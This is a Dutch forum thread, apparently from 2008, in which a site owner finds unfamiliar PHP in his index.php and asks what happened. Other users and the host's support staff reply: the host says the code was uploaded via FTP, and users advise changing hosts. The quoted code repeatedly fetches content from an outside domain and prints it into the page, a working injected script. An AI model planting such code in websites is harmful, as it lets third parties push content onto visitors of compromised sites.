Voor mijn website, MacVia.eu gebruik ik al enige tijd PHP. Ik ben een beginner in de taal, maar ik weet inmiddels genoeg voor een simpele website.

Nu vond ik vandaag deze code in mijn index.php, en ik weet 100% zeker dat ik hem er niet op heb gezet.. Weet iemand wat hier gebeurd is? Zou mijn host (Servage.net) het er in kunnen hebben gezet?

Alvast bedankt,
Een enigszins bezorgde Wannabe Steve

if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?3258");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?3258")); }
if($r) print $r;

if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?223");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?223")); }
if($r) print $r;

if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?5244");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?5244")); }
if($r) print $r;

if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?939");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?939")); }
if($r) print $r;

if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?2110");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?2110")); }
if($r) print $r;

Hoe staan je rechten van je index?  CHMOD heet dat dacht ik.

Van php weinig verstand, maar wel eens iets dergelijks aan de hand gehad. In de logfiles bij mijn hoster kon ik zien wanneer er iets was gedaan buiten mijn medeweten om en had daar ook de bijbehorende ip-adressen bij.

Ik heb daar geen toegang tot, maar ik zal Servage vragen om ze op te sturen, ik denk niet dat dat een probleem is, tenzij er een fout bij hen zit...

De index.php is op een goede manier geCHMOD (644) en is dus niet aanpasbaar door buitenstaanders..

(Bewerkt door wannabe steve om 17:47, 4-05-2008)

Google even...  Zo te zien is server gehacked, er zijn er veel meer op die box die het melden.

Het gesprek en de reacties van Servage:

Dear Servage,
Today I found a piece of code in my Index.php that doesn't quite belong there. I am positive I or any of my associates put it there. Could you please give me a possible explanation for the appearance of this?


if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://100500.muchcool.info/inc.php?3258");
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode("",file("http://100500.muchcool.info/inc.php?3258")); }
if($r) print $r;

Yours,

Henk N.

---------------------------

Hello Henk

Thank you for submitting a ticket.

Our admin has removed the unwanted code from index files of our users. It should work fine now. Please check and get back to us if you have further concerns.

Kind regards,
Victor, Servage Support
Servage Hosting

---------------------------

Dear Victor,

Thanks for replying to my ticket, I'm glad you removed this code from other people's indexes, but could you please explain to me how it got there in the first place? And how do I know it won't come back?

Yours,

Henk N.
May 04 - 16:21 GMT
Servage - Victor

---------------------------

May 04 - 16:51 GMT
Servage - Victor

Hello Henk

You're welcome.

The code was uploaded via FTP and our will try to figure out how to prevent this in future. As of now all index.php files are cleaned. If you face such problem again please get back to us.

Kind regards,
Victor, Servage Support
Servage Hosting

Op zich netjes dat ze het zo opgelost hebben, maar klinkt toch als een lekje bij je hoster.

'index.php' cleaned...  check je andere files voor de zekerheid ook..  als het een ff tegenzit heb je een hoop ellende. Als je geld verdiend met je site moet je overwegen een echte host te zoeken. Servage is niet echt save

Zowieso vreemd dat je als ontwikkelaar geen toegang hebt tot de syslog files van jouw directory...

Klinkt als een club waar ik zeker niet mijn sites zou willen hebben staan.
Goedkoop is toch vaak weer duurkoop.